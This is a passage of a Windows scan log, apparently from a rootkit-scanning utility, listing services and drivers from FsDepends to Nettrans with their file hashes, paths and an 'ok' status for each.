16:43:36.0773 0x0dd0  [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
16:43:36.0773 0x0dd0  FsDepends - ok
16:43:36.0788 0x0dd0  [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
16:43:36.0788 0x0dd0  Fs_Rec - ok
16:43:36.0788 0x0dd0  [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
16:43:36.0788 0x0dd0  fvevol - ok
16:43:36.0835 0x0dd0  [ 3DB005AE278886F7A055B2AD68D9E48D, 29A4B9C4C0C17C20B93558AE824FC131189F6F9679A1DC82EC0AF3278466EC9D ] fwlanusb6_860   C:\Windows\system32\DRIVERS\fwlanusb6_860.sys
16:43:36.0866 0x0dd0  fwlanusb6_860 - ok
16:43:36.0882 0x0dd0  [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx        C:\Windows\system32\drivers\gagp30kx.sys
16:43:36.0882 0x0dd0  gagp30kx - ok
16:43:36.0913 0x0dd0  [ E4AE497857409127ED57562AF913A903, 262ADD713B1FBF6200550967D1F8635B55D01BBD8FA2E753536E71A4EC87867B ] gpsvc           C:\Windows\System32\gpsvc.dll
16:43:36.0913 0x0dd0  gpsvc - ok
16:43:36.0929 0x0dd0  [ 750446ED76A5D13E902174DDDDA1A62B, F67355A6659E21D8D97E6982B28F22453F8C298E822E27FADDB440DA4A6DE7C0 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
16:43:36.0929 0x0dd0  gupdate - ok
16:43:36.0944 0x0dd0  [ 750446ED76A5D13E902174DDDDA1A62B, F67355A6659E21D8D97E6982B28F22453F8C298E822E27FADDB440DA4A6DE7C0 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
16:43:36.0944 0x0dd0  gupdatem - ok
16:43:36.0944 0x0dd0  [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
16:43:36.0944 0x0dd0  hcw85cir - ok
16:43:36.0960 0x0dd0  [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
16:43:36.0960 0x0dd0  HdAudAddService - ok
16:43:36.0975 0x0dd0  [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
16:43:36.0975 0x0dd0  HDAudBus - ok
16:43:36.0975 0x0dd0  [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
16:43:36.0975 0x0dd0  HidBatt - ok
16:43:36.0975 0x0dd0  [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth          C:\Windows\system32\drivers\hidbth.sys
16:43:36.0991 0x0dd0  HidBth - ok
16:43:36.0991 0x0dd0  [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr           C:\Windows\system32\drivers\hidir.sys
16:43:36.0991 0x0dd0  HidIr - ok
16:43:36.0991 0x0dd0  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv         C:\Windows\system32\hidserv.dll
16:43:36.0991 0x0dd0  hidserv - ok
16:43:36.0991 0x0dd0  [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
16:43:36.0991 0x0dd0  HidUsb - ok
16:43:37.0007 0x0dd0  [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc          C:\Windows\system32\kmsvc.dll
16:43:37.0007 0x0dd0  hkmsvc - ok
16:43:37.0007 0x0dd0  [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
16:43:37.0022 0x0dd0  HomeGroupListener - ok
16:43:37.0022 0x0dd0  [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
16:43:37.0022 0x0dd0  HomeGroupProvider - ok
16:43:37.0022 0x0dd0  [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
16:43:37.0038 0x0dd0  HpSAMD - ok
16:43:37.0053 0x0dd0  [ F61634BEC53F73702A10DE69F6DCAF57, BBA7344CF3AB96A46D1A6F1D50F2758EA8D097FE558C38B4EF45C8C334AF96E1 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
16:43:37.0053 0x0dd0  HTTP - ok
16:43:37.0069 0x0dd0  [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
16:43:37.0069 0x0dd0  hwpolicy - ok
16:43:37.0069 0x0dd0  [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
16:43:37.0069 0x0dd0  i8042prt - ok
16:43:37.0085 0x0dd0  [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
16:43:37.0085 0x0dd0  iaStorV - ok
16:43:37.0116 0x0dd0  [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc           C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
16:43:37.0131 0x0dd0  idsvc - ok
16:43:37.0131 0x0dd0  IEEtwCollectorService - ok
16:43:37.0147 0x0dd0  [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp           C:\Windows\system32\drivers\iirsp.sys
16:43:37.0147 0x0dd0  iirsp - ok
16:43:37.0163 0x0dd0  [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT          C:\Windows\System32\ikeext.dll
16:43:37.0178 0x0dd0  IKEEXT - ok
16:43:37.0178 0x0dd0  [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide        C:\Windows\system32\drivers\intelide.sys
16:43:37.0178 0x0dd0  intelide - ok
16:43:37.0178 0x0dd0  [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm        C:\Windows\system32\drivers\intelppm.sys
16:43:37.0178 0x0dd0  intelppm - ok
16:43:37.0194 0x0dd0  [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
16:43:37.0194 0x0dd0  IPBusEnum - ok
16:43:37.0194 0x0dd0  [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
16:43:37.0194 0x0dd0  IpFilterDriver - ok
16:43:37.0225 0x0dd0  [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
16:43:37.0225 0x0dd0  iphlpsvc - ok
16:43:37.0225 0x0dd0  [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
16:43:37.0241 0x0dd0  IPMIDRV - ok
16:43:37.0241 0x0dd0  [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
16:43:37.0241 0x0dd0  IPNAT - ok
16:43:37.0241 0x0dd0  [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM          C:\Windows\system32\drivers\irenum.sys
16:43:37.0241 0x0dd0  IRENUM - ok
16:43:37.0241 0x0dd0  [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp          C:\Windows\system32\drivers\isapnp.sys
16:43:37.0241 0x0dd0  isapnp - ok
16:43:37.0256 0x0dd0  [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
16:43:37.0256 0x0dd0  iScsiPrt - ok
16:43:37.0272 0x0dd0  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
16:43:37.0272 0x0dd0  kbdclass - ok
16:43:37.0272 0x0dd0  [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
16:43:37.0272 0x0dd0  kbdhid - ok
16:43:37.0272 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] KeyIso          C:\Windows\system32\lsass.exe
16:43:37.0272 0x0dd0  KeyIso - ok
16:43:37.0287 0x0dd0  [ 6F5F0C6160EF237F0243C1E416EEBA98, 8BA8AA0D71350A74E294A731226B1638C6059013D645ABDE7188F7733E320FBD ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
16:43:37.0287 0x0dd0  KSecDD - ok
16:43:37.0287 0x0dd0  [ 05529E53B286FD60E7EF04EF138CABFD, 6C045750DCD3EE76F748582513AD4FA99C0E8E56B616725CD48DCA1068FF8923 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
16:43:37.0287 0x0dd0  KSecPkg - ok
16:43:37.0287 0x0dd0  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk         C:\Windows\system32\drivers\ksthunk.sys
16:43:37.0287 0x0dd0  ksthunk - ok
16:43:37.0303 0x0dd0  [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm           C:\Windows\system32\msdtckrm.dll
16:43:37.0319 0x0dd0  KtmRm - ok
16:43:37.0319 0x0dd0  [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer    C:\Windows\system32\srvsvc.dll
16:43:37.0319 0x0dd0  LanmanServer - ok
16:43:37.0334 0x0dd0  [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
16:43:37.0334 0x0dd0  LanmanWorkstation - ok
16:43:37.0334 0x0dd0  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
16:43:37.0334 0x0dd0  lltdio - ok
16:43:37.0350 0x0dd0  [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
16:43:37.0350 0x0dd0  lltdsvc - ok
16:43:37.0350 0x0dd0  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts         C:\Windows\System32\lmhsvc.dll
16:43:37.0350 0x0dd0  lmhosts - ok
16:43:37.0365 0x0dd0  [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
16:43:37.0365 0x0dd0  LSI_FC - ok
16:43:37.0365 0x0dd0  [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
16:43:37.0365 0x0dd0  LSI_SAS - ok
16:43:37.0381 0x0dd0  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
16:43:37.0381 0x0dd0  LSI_SAS2 - ok
16:43:37.0381 0x0dd0  [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
16:43:37.0381 0x0dd0  LSI_SCSI - ok
16:43:37.0381 0x0dd0  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv           C:\Windows\system32\drivers\luafv.sys
16:43:37.0381 0x0dd0  luafv - ok
16:43:37.0397 0x0dd0  [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
16:43:37.0397 0x0dd0  Mcx2Svc - ok
16:43:37.0397 0x0dd0  [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas         C:\Windows\system32\drivers\megasas.sys
16:43:37.0397 0x0dd0  megasas - ok
16:43:37.0412 0x0dd0  [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
16:43:37.0412 0x0dd0  MegaSR - ok
16:43:37.0412 0x0dd0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS           C:\Windows\system32\mmcss.dll
16:43:37.0412 0x0dd0  MMCSS - ok
16:43:37.0428 0x0dd0  [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem           C:\Windows\system32\drivers\modem.sys
16:43:37.0428 0x0dd0  Modem - ok
16:43:37.0428 0x0dd0  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
16:43:37.0428 0x0dd0  monitor - ok
16:43:37.0428 0x0dd0  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
16:43:37.0428 0x0dd0  mouclass - ok
16:43:37.0428 0x0dd0  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
16:43:37.0428 0x0dd0  mouhid - ok
16:43:37.0443 0x0dd0  [ 8ADB5445B29941CB41AF2846FD5C93C7, 689582430FE29EC0845B1DB841D3CC49D5D09DE264586E3999EEFE616986D12B ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
16:43:37.0443 0x0dd0  mountmgr - ok
16:43:37.0443 0x0dd0  [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio            C:\Windows\system32\drivers\mpio.sys
16:43:37.0443 0x0dd0  mpio - ok
16:43:37.0459 0x0dd0  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
16:43:37.0459 0x0dd0  mpsdrv - ok
16:43:37.0475 0x0dd0  [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc          C:\Windows\system32\mpssvc.dll
16:43:37.0490 0x0dd0  MpsSvc - ok
16:43:37.0490 0x0dd0  [ 98DB1790F0A584E0A2528B92B052417F, 9AA04CA73AFE599810CD233B9CEC212E16D44DCEDF5C7D0181C7257F498068B5 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
16:43:37.0490 0x0dd0  MRxDAV - ok
16:43:37.0506 0x0dd0  [ 632E8A00090E4F85F304E152C92C7F2C, A3098941251A8327C95E6B1122384D54FB0ED705A9215577D968EA5B5FD88C87 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
16:43:37.0506 0x0dd0  mrxsmb - ok
16:43:37.0506 0x0dd0  [ 0D9C05484F2F4BD9D33A615D5DBE67EA, 1E164B631B1CD85DD5B205284CB547B189609946490AAABD22741743BFB413DF ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
16:43:37.0521 0x0dd0  mrxsmb10 - ok
16:43:37.0615 0x0dd0  [ 6123E6FECC1C164022868FB1982271BE, 417E6C7AFF8B014B31AFCC202B0DCEECBDBB73205DF8C3EFC7E313664E284178 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
16:43:37.0615 0x0dd0  mrxsmb20 - ok
16:43:37.0615 0x0dd0  [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci          C:\Windows\system32\drivers\msahci.sys
16:43:37.0615 0x0dd0  msahci - ok
16:43:37.0615 0x0dd0  [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
16:43:37.0615 0x0dd0  msdsm - ok
16:43:37.0631 0x0dd0  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC           C:\Windows\System32\msdtc.exe
16:43:37.0631 0x0dd0  MSDTC - ok
16:43:37.0631 0x0dd0  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
16:43:37.0631 0x0dd0  Msfs - ok
16:43:37.0646 0x0dd0  [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
16:43:37.0646 0x0dd0  mshidkmdf - ok
16:43:37.0646 0x0dd0  [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
16:43:37.0646 0x0dd0  msisadrv - ok
16:43:37.0646 0x0dd0  [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
16:43:37.0646 0x0dd0  MSiSCSI - ok
16:43:37.0662 0x0dd0  msiserver - ok
16:43:37.0662 0x0dd0  [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
16:43:37.0662 0x0dd0  MSKSSRV - ok
16:43:37.0662 0x0dd0  [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
16:43:37.0662 0x0dd0  MSPCLOCK - ok
16:43:37.0662 0x0dd0  [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
16:43:37.0662 0x0dd0  MSPQM - ok
16:43:37.0677 0x0dd0  [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
16:43:37.0677 0x0dd0  MsRPC - ok
16:43:37.0677 0x0dd0  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
16:43:37.0693 0x0dd0  mssmbios - ok
16:43:37.0693 0x0dd0  [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
16:43:37.0693 0x0dd0  MSTEE - ok
16:43:37.0693 0x0dd0  [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
16:43:37.0693 0x0dd0  MTConfig - ok
16:43:37.0693 0x0dd0  [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup             C:\Windows\system32\Drivers\mup.sys
16:43:37.0693 0x0dd0  Mup - ok
16:43:37.0709 0x0dd0  [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent        C:\Windows\system32\qagentRT.dll
16:43:37.0709 0x0dd0  napagent - ok
16:43:37.0724 0x0dd0  [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
16:43:37.0724 0x0dd0  NativeWifiP - ok
16:43:37.0755 0x0dd0  [ F7309F42555F8AAB7144A51A1F2585B0, 065277A8AFAEE3888C997A76D2F751070F92DF4C3354D16B194860B4BDAFF937 ] NDIS            C:\Windows\system32\drivers\ndis.sys
16:43:37.0771 0x0dd0  NDIS - ok
16:43:37.0771 0x0dd0  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
16:43:37.0771 0x0dd0  NdisCap - ok
16:43:37.0771 0x0dd0  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
16:43:37.0771 0x0dd0  NdisTapi - ok
16:43:37.0787 0x0dd0  [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
16:43:37.0787 0x0dd0  Ndisuio - ok
16:43:37.0787 0x0dd0  [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
16:43:37.0787 0x0dd0  NdisWan - ok
16:43:37.0787 0x0dd0  [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
16:43:37.0787 0x0dd0  NDProxy - ok
16:43:37.0802 0x0dd0  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
16:43:37.0802 0x0dd0  NetBIOS - ok
16:43:37.0802 0x0dd0  [ E47D571FEC2C76E867935109AB2A770C, F349D25890B6F476B106FD75BFB081DB737CA9B224D95E44927942FFF2DF82CD ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
16:43:37.0802 0x0dd0  NetBT - ok
16:43:37.0818 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] Netlogon        C:\Windows\system32\lsass.exe
16:43:37.0818 0x0dd0  Netlogon - ok
16:43:37.0818 0x0dd0  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
16:43:37.0833 0x0dd0  Netman - ok
16:43:37.0833 0x0dd0  [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:43:37.0833 0x0dd0  NetMsmqActivator - ok
16:43:37.0833 0x0dd0  [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:43:37.0849 0x0dd0  NetPipeActivator - ok
16:43:37.0849 0x0dd0  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
16:43:37.0865 0x0dd0  netprofm - ok
16:43:37.0865 0x0dd0  [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:43:37.0865 0x0dd0  NetTcpActivator - ok
16:43:37.0880 0x0dd0  [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:43:37.0880 0x0dd0  NetTcpPortSharing - ok
16:43:37.0880 0x0dd0  [ 031D3DF5DD045BE797FAC422500F06AF, F0BEE1EB5A7D5E5E5DF5B6AB68C87310D00D150889AD9FA810B1235B5C9D19C0 ] Nettrans        C:\ProgramData\PrefsSecure\Nettrans.exe
16:43:37.0880 0x0dd0  Nettrans - ok
